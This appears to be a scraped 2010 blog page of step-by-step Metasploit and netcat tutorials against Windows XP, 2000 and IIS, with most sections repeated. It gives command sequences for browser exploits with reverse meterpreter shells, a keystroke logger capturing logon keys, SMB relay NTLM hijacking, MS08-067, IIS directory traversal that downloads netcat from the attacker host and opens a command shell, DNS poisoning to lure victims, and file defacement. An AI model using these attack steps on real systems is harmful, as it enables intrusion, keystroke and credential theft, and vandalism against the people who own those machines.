cd /pentest/exploits/msf3
./msfconsole
msf > use windows/browser/ie_aurora
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit
Tuesday, March 9, 2010
Tutorial: Keystore Logger with Meterpreter
Target: 131.107.1.50 (Windows XP SP2 English)
Yours: 131.107.1.522 (BackTrack 3 with Metasploit 3.x)
Step 1: Exploit with Windows Animated Cursor Vulnerability (CVE-2007-0028)
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/browser/ani_loadimage_chunksize
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set LHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit
Step 2: Connect to the attacker's machine via IE 6
http://131.107.1.252/you_win.html
Note:
Use the DNS poisoning or cache poisoning to change the IP address to a domain name.
Example:
www.abc.com 131.107.1.252
http://www.abc.com/you_win.html
Once you've got the connection, type:
msf > sessions -l
msf > sessions -i 1
Step 3: Migrate the processes (Explorer.exe or Winlogon.exe)
Note:
- Migrate the Explorer.exe if you want to capture the Desktop keystrokes.
- Migrate the Winlogon.exe if you want to capture the Windows Logon keystrokes.
List all processes...
meterpreter > ps
Migrate Explorer.exe or Winlogon.exe (use the PID number)
meterpreter > migrate
Start the Keystroke Logger...
meterpreter > keyscan_start
Display the captured keystrokes...
meterpreter > keyscan_dump
Stop the Keystroke Logger...
meterpreter > keyscan_stop
Yours: 131.107.1.522 (BackTrack 3 with Metasploit 3.x)
Step 1: Exploit with Windows Animated Cursor Vulnerability (CVE-2007-0028)
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/browser/ani_loadimage_chunksize
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set LHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit
Step 2: Connect to the attacker's machine via IE 6
http://131.107.1.252/you_win.html
Note:
Use the DNS poisoning or cache poisoning to change the IP address to a domain name.
Example:
www.abc.com 131.107.1.252
http://www.abc.com/you_win.html
Once you've got the connection, type:
msf > sessions -l
msf > sessions -i 1
Step 3: Migrate the processes (Explorer.exe or Winlogon.exe)
Note:
- Migrate the Explorer.exe if you want to capture the Desktop keystrokes.
- Migrate the Winlogon.exe if you want to capture the Windows Logon keystrokes.
List all processes...
meterpreter > ps
Migrate Explorer.exe or Winlogon.exe (use the PID number)
meterpreter > migrate
Start the Keystroke Logger...
meterpreter > keyscan_start
Display the captured keystrokes...
meterpreter > keyscan_dump
Stop the Keystroke Logger...
meterpreter > keyscan_stop
Tutorial: NTLM Hijacking with SMB Relay Exploit
Target: 192.168.1.50 (Windows XP SP2 English)
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Prepare the SMB Exploit
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/smb/smb_relay
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 192.168.1.252
msf > set LHOST 192.168.1.252
msf > set LPORT 5555
msf > exploit
Step 2: Connect to the FAKE shared folder from the remote machine
\\192.168.1.252\shared\xxx.jpg
shared\xxx.jpg is a fake link
Step 3: Interact with the open session
Check the active sessions...
msf > sessions -l
Interact with active session# 1
msf > sessions -i 1
Command shell...
meterpreter > shell
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Prepare the SMB Exploit
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/smb/smb_relay
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 192.168.1.252
msf > set LHOST 192.168.1.252
msf > set LPORT 5555
msf > exploit
Step 2: Connect to the FAKE shared folder from the remote machine
\\192.168.1.252\shared\xxx.jpg
shared\xxx.jpg is a fake link
Step 3: Interact with the open session
Check the active sessions...
msf > sessions -l
Interact with active session# 1
msf > sessions -i 1
Command shell...
meterpreter > shell
Tutorial: Exploiting Windows XP SP2 with MS08-067 Vulnerability
Target: 192.168.1.50 (Windows XP SP2 English)
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Scan for SMB Vulnerability (netapi = MS08-067)
nmap -sS --script=smb-check-vulns 192.168.1.50
Step 2: Check the SMB Version (O/S, SP level & Language)
cd /pentest/exploits/msf3
./msfconsole
msf > use scanner/smb/smb_version
msf > set RHOSTS 192.168.1.50
msf > run
Step 3: Exploit with MS08-067 module
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 192.168.1.50
msf > show targets
msf > set TARGET 3 (depends on step# 2)
msf > run
meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Scan for SMB Vulnerability (netapi = MS08-067)
nmap -sS --script=smb-check-vulns 192.168.1.50
Step 2: Check the SMB Version (O/S, SP level & Language)
cd /pentest/exploits/msf3
./msfconsole
msf > use scanner/smb/smb_version
msf > set RHOSTS 192.168.1.50
msf > run
Step 3: Exploit with MS08-067 module
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 192.168.1.50
msf > show targets
msf > set TARGET 3 (depends on step# 2)
msf > run
meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
Tutorial: Enumeration via SMB/CIFS
Enumerate Users
nmap -sS --script=smb-enum-users ip_address
Enumerate Shared Folders
nmap -sS --script=smb-enum-shares ip_address
Enumeration with Metasploit Auxiliary module
cd /pentest/exploits/msf3
./msfconsole
msf > scanner/smb/smb_enumusers
msf > set RHOSTS ip_address
msf > run
nmap -sS --script=smb-enum-users ip_address
Enumerate Shared Folders
nmap -sS --script=smb-enum-shares ip_address
Enumeration with Metasploit Auxiliary module
cd /pentest/exploits/msf3
./msfconsole
msf > scanner/smb/smb_enumusers
msf > set RHOSTS ip_address
msf > run
Monday, March 8, 2010
Tutorial: Metasploit Framework 3.x Basics
cd /pentest/exploits/msf3
./msfconsole
msf > search iis
ISAPI Printer Overflow Exploit
msf > info windows/iis/ms01_023_printer
msf > use windows/iis/ms01_023_printer
msf > show payloads
Bind TCP payload
msf > set PAYLOAD windows/shell/bind_tcp
msf > show options
Set the target IP address
msf > set RHOST 131.107.1.101
msf > exploit
./msfconsole
msf > search iis
ISAPI Printer Overflow Exploit
msf > info windows/iis/ms01_023_printer
msf > use windows/iis/ms01_023_printer
msf > show payloads
Bind TCP payload
msf > set PAYLOAD windows/shell/bind_tcp
msf > show options
Set the target IP address
msf > set RHOST 131.107.1.101
msf > exploit
Tutorial: IIS Unicode Directory Traversal
Step 1: Testing IIS Directory Traversal Exploit
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 2: Upload Netcat to the target machine
Make sure that you have started TFTPD service (Start > Services > TFTPD > Start TFTPD) and copy nc.exe from /pentest/windows_binaries/tools directory to /tmp directory.
cd /pentest/windows_binaries/tools
cp nc.exe /tmp
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
Step 3: Verify if Netcat has been uploaded
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 4: Launch Netcat in listening mode (from the target) port 5555 (launch netcat and spwn a command shell)
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+-l+-p+5555+-d+-e+cmd.exe
Step 5: Connect to the open port on the remote machine
nc -v 131.107.1.101 5555
131.107.1.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [131.107.1.101] 5555 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 131.107.1.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Step 6: Test our priviledge level by writing a file to multiple directories.
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > hacked.txt
echo HACKED BY MR.PEANUT! > hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\hacked.txt
echo HACKED BY MR.PEANUT! > c:\hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Access is denied.
c:\inetpub\scripts>
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 2: Upload Netcat to the target machine
Make sure that you have started TFTPD service (Start > Services > TFTPD > Start TFTPD) and copy nc.exe from /pentest/windows_binaries/tools directory to /tmp directory.
cd /pentest/windows_binaries/tools
cp nc.exe /tmp
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
Step 3: Verify if Netcat has been uploaded
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 4: Launch Netcat in listening mode (from the target) port 5555 (launch netcat and spwn a command shell)
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+-l+-p+5555+-d+-e+cmd.exe
Step 5: Connect to the open port on the remote machine
nc -v 131.107.1.101 5555
131.107.1.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [131.107.1.101] 5555 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 131.107.1.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Step 6: Test our priviledge level by writing a file to multiple directories.
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > hacked.txt
echo HACKED BY MR.PEANUT! > hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\hacked.txt
echo HACKED BY MR.PEANUT! > c:\hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Access is denied.
c:\inetpub\scripts>
Subscribe to:
Posts (Atom)